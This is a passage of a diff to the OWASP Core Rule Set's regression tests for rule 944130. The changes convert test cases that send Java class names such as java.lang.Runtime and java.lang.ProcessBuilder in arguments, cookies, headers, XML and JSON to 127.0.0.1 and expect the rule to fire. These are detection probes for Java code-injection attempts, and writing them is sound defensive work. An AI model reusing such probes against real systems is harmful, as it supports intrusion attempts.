"en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944130] + - test_id: 329 desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.ProcessBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.ProcessBuilder\"}" + output: + log: + expect_ids: [944130] + - test_id: 330 desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.ProcessBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-331 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.ProcessBuilder\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 331 desc: "Argument test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-332 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 332 desc: "Argument name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-333 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect=test" + output: + log: + expect_ids: [944130] + - test_id: 333 desc: "Cookie test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-334 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 334 desc: "Cookie name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.reflect=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-335 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.reflect=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 335 desc: "Request header test includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.reflect - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-336 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.reflect + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 336 desc: "XML attribute value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-337 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 337 desc: "XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-338 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 338 desc: "Nested XML element value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-339 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 339 desc: "Content-Type text/plain includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - test_title: 944130-340 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.reflect" + output: + log: + expect_ids: [944130] + - test_id: 340 desc: "Content-Type application/json arg value includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.reflect\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-341 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.reflect\"}" + output: + log: + expect_ids: [944130] + - test_id: 341 desc: "Content-Type application/json arg name includes keyword java.lang.reflect" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.reflect\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-342 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.reflect\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 342 desc: "Argument test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-343 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 343 desc: "Argument name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-344 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime=test" + output: + log: + expect_ids: [944130] + - test_id: 344 desc: "Cookie test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-345 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 345 desc: "Cookie name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-346 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 346 desc: "Request header test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-347 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 347 desc: "XML attribute value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-348 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 348 desc: "XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-349 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 349 desc: "Nested XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-350 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 350 desc: "Content-Type text/plain includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-351 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944130] + - test_id: 351 desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Runtime\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-352 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log: + expect_ids: [944130] + - test_id: 352 desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Runtime\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-353 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 353 desc: "Argument test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-354 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 354 desc: "Argument name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-355 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String=test" + output: + log: + expect_ids: [944130] + - test_id: 355 desc: "Cookie test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-356 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 356 desc: "Cookie name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.String=test - method: "POST" - uri: "/post" - version: 